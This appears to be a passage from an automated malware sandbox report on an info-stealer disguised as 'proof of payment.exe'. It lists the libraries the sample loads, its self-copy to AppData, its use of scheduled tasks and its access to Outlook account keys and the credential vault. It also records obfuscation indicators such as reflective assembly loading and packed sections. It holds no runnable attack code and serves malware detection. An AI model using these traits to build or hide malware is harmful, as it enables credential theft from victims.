                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: version.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: pstorec.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: vaultcli.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: pstorec.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\proof of payment.exe  File opened: C:\Users\user\Desktop\proof of payment.cfg
                    Source: Window Recorder  Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\proof of payment.exe  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: proof of payment.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: proof of payment.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: 0.2.proof of payment.exe.5130000.6.raw.unpack, XG.cs  .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                    Source: proof of payment.exe, InfoForm.cs  .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: NvbYSEq.exe.0.dr, InfoForm.cs  .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: 0.2.proof of payment.exe.2683120.0.raw.unpack, .cs  .Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, pr8Do41Q1tqFwxoK05.cs  .Net Code: YYmj2I0glM System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.proof of payment.exe.4f00000.4.raw.unpack, .cs  .Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, pr8Do41Q1tqFwxoK05.cs  .Net Code: YYmj2I0glM System.Reflection.Assembly.Load(byte[])
                    Source: 8.2.NvbYSEq.exe.25c3108.0.raw.unpack, .cs  .Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Code function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_0041CB50
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 7_2_10002806 push ecx; ret 7_2_10002819
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Code function: 8_2_0686984A push E9906C8Fh; ret 8_2_0686985C
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Code function: 8_2_0686C992 push E8FFFFFFh; iretd 8_2_0686C99D
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Code function: 12_2_00457106 push ecx; ret 12_2_00457119
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Code function: 12_2_0045B11A push esp; ret 12_2_0045B141
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Code function: 12_2_0045E54D push esi; ret 12_2_0045E556
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Code function: 12_2_00457A28 push eax; ret 12_2_00457A46
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Code function: 12_2_00434E56 push ecx; ret 12_2_00434E69
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 15_2_0044693D push ecx; ret 15_2_0044694D
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 15_2_00451D54 push eax; ret 15_2_00451D61
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 17_2_0044B090 push eax; ret 17_2_0044B0A4
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 17_2_0044B090 push eax; ret 17_2_0044B0CC
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 17_2_00451D34 push eax; ret 17_2_00451D41
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 17_2_00444E71 push ecx; ret 17_2_00444E81
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 20_2_00414060 push eax; ret 20_2_00414074
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 20_2_00414060 push eax; ret 20_2_0041409C
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 20_2_00414039 push ecx; ret 20_2_00414049
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 20_2_004164EB push 0000006Ah; retf 20_2_004165C4
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 20_2_00416553 push 0000006Ah; retf 20_2_004165C4
                    Source: C:\Users\user\Desktop\proof of payment.exe  Code function: 20_2_00416555 push 0000006Ah; retf 20_2_004165C4
                    Source: proof of payment.exe  Static PE information: section name: .text entropy: 7.988023924339669
                    Source: NvbYSEq.exe.0.dr  Static PE information: section name: .text entropy: 7.988023924339669
                    Source: 0.2.proof of payment.exe.5130000.6.raw.unpack, XG.cs  High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, O04JbMpW67PNEoiq0y.cs  High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'LFnreChvBM', 'qc9rFHbpxX', 'EFMrz9uWvg', 'BcUT8VKtCk', 'pNaT7QbYeb', 'gELTr0RMka', 'nonTTNEExw', 'JKqTCRtT02uAYJPq4DQ'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, KgSR3u8nGBA1sLZNNP.cs  High entropy of concatenated method names: 'P3kSxguUdE', 'rrfS3P41Lg', 'HtWVcnAS2h', 'vruVqTjcr6', 'juvVmxsd82', 'EVcVw6TC5x', 'b4gVdPOK25', 'olRV59jdO9', 'U3cV1JFlpf', 'fj9Vl0ddoF'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, woM7QtlW1bUYg1UktQ.cs  High entropy of concatenated method names: 'Dispose', 'Igf7eh15cC', 'dHLrtBkvqb', 'hvSii582gn', 'iui7Fc4kqI', 'nXH7z6UCLr', 'ProcessDialogKey', 'cfhr86d3tt', 'HFwr7YmbAM', 'xunrrPcb5R'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, qGDm8F0vo4f3CaqRJ8.cs  High entropy of concatenated method names: 'c78HLgHUJD', 'OBcHak649G', 'HxgHShtAgg', 'D7AH03dKoM', 'RU2HDuDAkb', 'r8fSy1OZPp', 'ld3SCkaKsE', 'dqZSE4uAIY', 'sVjSJL2H0w', 'fGRSe1Mo6S'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, WHxJ2tyopBTMyOacdk.cs  High entropy of concatenated method names: 'kc60OmF2oo', 'qQv0WULlM8', 'NDL02FH5fP', 'HSm0BrfdRb', 'Hpe0xmPnWd', 'Ywq0vpPw6W', 'juF03HXE3f', 'fBJ0genqfJ', 'y6L0U7JlFI', 'dDt04ixvVE'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, eoECqEoP1MV499hB3G.cs  High entropy of concatenated method names: 'ToString', 'wheGQdrMV0', 'X8oGt9PNmQ', 'cB2GcFGSZO', 'MGBGqIH73k', 'qraGmQh86Y', 'HotGwQikvy', 'T9JGd1uxqQ', 'NvXG5d7waa', 'ip6G1ABwCa'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, j4jqMnwViZQb4cRVS7.cs  High entropy of concatenated method names: 'C9HVBUcx40', 'CkBVvXsIr4', 'EiFVg3cDwC', 'l7qVU2qi0a', 'tomVsRKk2M', 'VFSVGX4w9O', 'PYpVpv8PZb', 'FjLVXSkC6V', 'EyMVKJyQx1', 'WeGVh5xc7G'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, R0k6N6vsjjBavB4q3V.cs  High entropy of concatenated method names: 'd8EfglaEhg', 'DPqfUINGbJ', 'F9qf9Niwtu', 'dT3ftUcLhm', 'XMHfqEONFQ', 'fwRfmkUYMa', 'tIPfdNk927', 'egTf5HkCwQ', 'hd6flQi1gS', 'YOVfQJ8A9a'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, ijAOQ7mRGBRMsxXAQS.cs  High entropy of concatenated method names: 'id80MrVhlr', 'fsw0VIEihp', 'qC50HAu48f', 'SbtHFc2cwO', 'TSoHzCf1XE', 'cjl08o6SaB', 'UMb07Xp8jK', 'B3K0raOfa1', 'UVw0T6ZRnD', 'o6D0jMNDxJ'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, m27lXb6r4MZHCO3jU8.cs  High entropy of concatenated method names: 'Sih2OOCtM', 'n52BO9bSD', 'b8RvG7YEC', 'JXZ30KgVr', 'rssU2I0M5', 'rWO4W2Hc1', 'zDuv7tNsEPTgry2KMo', 'C5w0yhE86TSUGIafMT', 'UZGX8cNuO', 'g2XhkjOhy'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, NmD84IhXqX5T6TEkV6.csHigh entropy of concatenated method names: 'wCHpJPJyR0', 'sxRpFvTw8H', 'eJMX8bKCu2', 'fUQX79yjrG', 'VZUpQaEvUO', 'x3opPsGdNj', 'xy0pALit6q', 'WV5pRXljyr', 'OxCpZLEIc9', 'cOPpnkgyns'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, F2PTqtdykfFUcIb56j.csHigh entropy of concatenated method names: 'AYgX9KKbxn', 'IqJXtfDiRt', 'UREXcWxQJf', 'VvfXqHxDDH', 'EYjXREkAOI', 'IjNXmuPgeM', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, lCRMA5DlhXbJjo7mgP.csHigh entropy of concatenated method names: 'XOUK7fOCGk', 'eBtKTbHBlE', 'GNrKjjqQYp', 'mniKMCNMTC', 'HkgKaTcPaL', 's5bKSBPZ9g', 'G7kKHQUQjE', 't64XE23Zn0', 'mkBXJjYgka', 'DVXXeBXhbW'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, pr8Do41Q1tqFwxoK05.csHigh entropy of concatenated method names: 'eWBTLXt3er', 'iOtTMlUF5l', 'OQ4TaT1ZsC', 'VibTVbpR7H', 'ADVTS4dCv0', 'KadTHMkTAy', 'vNhT0qwQbT', 'VZtTD7HKkP', 'dxpTIOGC08', 'qQHTu998oi'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, rhi5WUbqRqYWJ4I5aL.csHigh entropy of concatenated method names: 'gXhpu9v1k5', 'OIqpkIdKxY', 'ToString', 'De3pMtqr5e', 'eIlpa4KGgS', 'jRTpVokqo0', 'LYEpSmeS0j', 'ALqpH6LbN9', 'vosp0ysL2B', 'wmRpDn8t0K'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, CmapgpqkNF7N5qJ90ud.csHigh entropy of concatenated method names: 'alqKOrJ0pj', 'og8KWuXd29', 'iIAK2rCVFe', 'GWTKBUdRp1', 'UwMKx4rRBo', 'RDHKvT0qhU', 'fjHK3v12CM', 'cmdKgBShHa', 'YhIKUBFLmT', 'JmNK404BNS'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, HZasU9nsywqiKFgaDv.csHigh entropy of concatenated method names: 'onQaRYYxBE', 'IM2aZtghIN', 'RpFanjrrNu', 'sIka6VaZwU', 'BavayUICgv', 'PdAaCMI85I', 'KmEaES8IZt', 'nKraJ28955', 'opkaew46xI', 'K1xaFe1Yc2'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, t3dR5NEyPQ0BnbAjPf.csHigh entropy of concatenated method names: 'KNHXMolEP8', 'MFVXaqPpuS', 'APNXVJBc3n', 'bE9XSoGTZE', 'uoYXHO6fxn', 'AYZX0iFBhY', 'OGvXD9JRVh', 'dHcXIGfsdW', 'TIpXufgcOF', 'wufXkDqp0f'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, zUd261zcGb9YwcjLSm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UUtKfeexau', 'QuMKsB0qwN', 'vbwKGbQ8Rm', 'GC9KpQCDUY', 'qhYKX3mUHu', 't4TKKjEyun', 'v3iKhbT2Un'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, ir4OiiaLqZUjSaiS1D.csHigh entropy of concatenated method names: 'BPZ70EqBf8', 'Iso7D7DIGj', 'mON7u8pSmB', 'otW7kHJ1EU', 'Nph7snNx7b', 'N7o7Gd9CgL', 'YWb0Zj1DxBQUSZDFr5', 'd0DGejsIX4gCSvvaDM', 'gTr77yfym1', 'fiq7TWyUCH'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, O04JbMpW67PNEoiq0y.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'LFnreChvBM', 'qc9rFHbpxX', 'EFMrz9uWvg', 'BcUT8VKtCk', 'pNaT7QbYeb', 'gELTr0RMka', 'nonTTNEExw', 'JKqTCRtT02uAYJPq4DQ'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, KgSR3u8nGBA1sLZNNP.csHigh entropy of concatenated method names: 'P3kSxguUdE', 'rrfS3P41Lg', 'HtWVcnAS2h', 'vruVqTjcr6', 'juvVmxsd82', 'EVcVw6TC5x', 'b4gVdPOK25', 'olRV59jdO9', 'U3cV1JFlpf', 'fj9Vl0ddoF'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, woM7QtlW1bUYg1UktQ.csHigh entropy of concatenated method names: 'Dispose', 'Igf7eh15cC', 'dHLrtBkvqb', 'hvSii582gn', 'iui7Fc4kqI', 'nXH7z6UCLr', 'ProcessDialogKey', 'cfhr86d3tt', 'HFwr7YmbAM', 'xunrrPcb5R'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, qGDm8F0vo4f3CaqRJ8.csHigh entropy of concatenated method names: 'c78HLgHUJD', 'OBcHak649G', 'HxgHShtAgg', 'D7AH03dKoM', 'RU2HDuDAkb', 'r8fSy1OZPp', 'ld3SCkaKsE', 'dqZSE4uAIY', 'sVjSJL2H0w', 'fGRSe1Mo6S'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, WHxJ2tyopBTMyOacdk.csHigh entropy of concatenated method names: 'kc60OmF2oo', 'qQv0WULlM8', 'NDL02FH5fP', 'HSm0BrfdRb', 'Hpe0xmPnWd', 'Ywq0vpPw6W', 'juF03HXE3f', 'fBJ0genqfJ', 'y6L0U7JlFI', 'dDt04ixvVE'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, eoECqEoP1MV499hB3G.csHigh entropy of concatenated method names: 'ToString', 'wheGQdrMV0', 'X8oGt9PNmQ', 'cB2GcFGSZO', 'MGBGqIH73k', 'qraGmQh86Y', 'HotGwQikvy', 'T9JGd1uxqQ', 'NvXG5d7waa', 'ip6G1ABwCa'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, j4jqMnwViZQb4cRVS7.csHigh entropy of concatenated method names: 'C9HVBUcx40', 'CkBVvXsIr4', 'EiFVg3cDwC', 'l7qVU2qi0a', 'tomVsRKk2M', 'VFSVGX4w9O', 'PYpVpv8PZb', 'FjLVXSkC6V', 'EyMVKJyQx1', 'WeGVh5xc7G'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, R0k6N6vsjjBavB4q3V.csHigh entropy of concatenated method names: 'd8EfglaEhg', 'DPqfUINGbJ', 'F9qf9Niwtu', 'dT3ftUcLhm', 'XMHfqEONFQ', 'fwRfmkUYMa', 'tIPfdNk927', 'egTf5HkCwQ', 'hd6flQi1gS', 'YOVfQJ8A9a'
